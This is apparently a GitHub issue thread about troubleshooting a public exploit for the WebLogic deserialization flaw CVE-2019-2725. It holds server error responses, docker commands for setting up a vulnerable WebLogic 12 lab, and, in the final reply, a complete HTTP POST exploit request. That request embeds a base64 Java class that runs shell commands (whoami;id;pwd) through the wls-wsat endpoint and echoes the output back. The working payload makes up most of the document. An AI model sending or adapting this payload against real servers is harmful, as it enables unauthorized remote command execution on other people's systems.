java.io.IOException javax.xml.stream.XMLStreamException: Error at line:0 col:0 Line:32 A '"'

Question

java.io.IOException javax.xml.stream.XMLStreamException: Error at line:0 col:0 Line:32 A '"'

hktalent opened this issue 5 years ago · comments

use
https://raw.githubusercontent.com/lufeirider/CVE-2019-2725/master/weblogic-2019-2725_12.1.3命令执行.txt
error:

<env:Envelope xmlns:env="http://schemas.xmlsoap.org/soap/envelope/"><env:Header/><env:Body><env:Fault><faultcode>env:Client</faultcode><faultstring>Unable to parse the incoming request</faultstring><detail><java:string xmlns:java="java.io">java.io.IOException
javax.xml.stream.XMLStreamException: Error at line:0 col:0 Line:32 A '"' was expected,  this attribute was not terminated by a matching double quote
Error at line:0 col:0 Line:32 A '"' was expected,  this attribute was not terminated by a matching double quote
</java:string></detail></env:Fault></env:Body></env:Envelope>

51pwn · Answer 1 · Mon Jun 03 2019 16:28:20 GMT+0800 (China Standard Time)

use https://raw.githubusercontent.com/lufeirider/CVE-2019-2725/master/weblogic-2019-2725-12.1.3回显检测.txt
error

<env:Envelope xmlns:env="http://schemas.xmlsoap.org/soap/envelope/"><env:Header/><env:Body><env:Fault><faultcode>env:Server</faultcode><faultstring></faultstring><detail><java:string xmlns:java="java.io">java.lang.NullPointerException&#xA;</java:string></detail></env:Fault></env:Body></env:Envelope>

Jas502n · Answer 2 · Tue Jun 04 2019 02:04:13 GMT+0800 (China Standard Time)

You should weblogic12

docker pull ismaleiva90/weblogic12
Using default tag: latest
latest: Pulling from ismaleiva90/weblogic12
a3ed95caeb02: Pull complete 
b82337cd1027: Pull complete 
9e3715b1d6be: Pull complete 
3247d9683c11: Pull complete 
b8c01449cf4a: Pull complete 
91c32b48ce3b: Pull complete 
c617a682e3f2: Pull complete 
83083f09438c: Pull complete 
fe83b45f7a9f: Pull complete 
db497d879495: Pull complete 
2a44b564a6af: Pull complete 
cf65f5fbc4e9: Pull complete 
37170691a3c4: Pull complete 
59fd638f77cf: Pull complete 
c0a9d25582e2: Pull complete 
816614cf1ec2: Pull complete 
5cf15f6bb208: Pull complete 
eebf27ebdf8a: Pull complete 
5d3a0c287a13: Pull complete 
fec10779fa63: Pull complete 
Digest: sha256:12d2cb79c438277e4c775d36cbe07cf1b54b201641f9efdd937a174be72a6f48
Status: Downloaded newer image for ismaleiva90/weblogic12:latest

docker run -d -p 6661:7001 -p 6662:7002 -p 6663:5556 ismaleiva90/weblogic12:latest

Jas502n · Answer 3 · Tue Jun 04 2019 02:14:27 GMT+0800 (China Standard Time)

Burpsuite (whoami;id;pwd)

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 10.10.20.100:6661
Content-Length: 4414
Accept-Encoding: gzip, deflate
Accept: */*
content-type: text/xml


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
<java>
<class><string>org.slf4j.ext.EventData</string>
<void>
<string>
		<java>
			<void class="sun.misc.BASE64Decoder">
				<void method="decodeBuffer" id="byte_arr">	<string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string>
				</void>
			</void>
			<void class="org.mozilla.classfile.DefiningClassLoader">
				<void method="defineClass">
					<string>ResultBaseExec</string>
					<object idref="byte_arr"></object>
					<void method="newInstance">
						<void method="do_exec" id="result">
							<string>whoami;id;pwd</string>
						</void>
					</void>
				</void>
			</void>

			<void class="java.lang.Thread" method="currentThread">
				<void method="getCurrentWork" id="current_work">
					<void method="getClass">
						<void method="getDeclaredField">
							<string>connectionHandler</string>
								<void method="setAccessible"><boolean>true</boolean></void>
							<void method="get">
								<object idref="current_work"></object>
								<void method="getServletRequest">
									<void method="getResponse">
										<void method="getServletOutputStream">
											<void method="writeStream">
												<object class="weblogic.xml.util.StringInputStream"><object idref="result"></object></object>
												</void>
											<void method="flush"/>
											</void>
									<void method="getWriter"><void method="write"><string></string></void></void>
									</void>
								</void>
							</void>
						</void>
					</void>
				</void>
			</void>
		</java>
</string>
</void>
</class>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>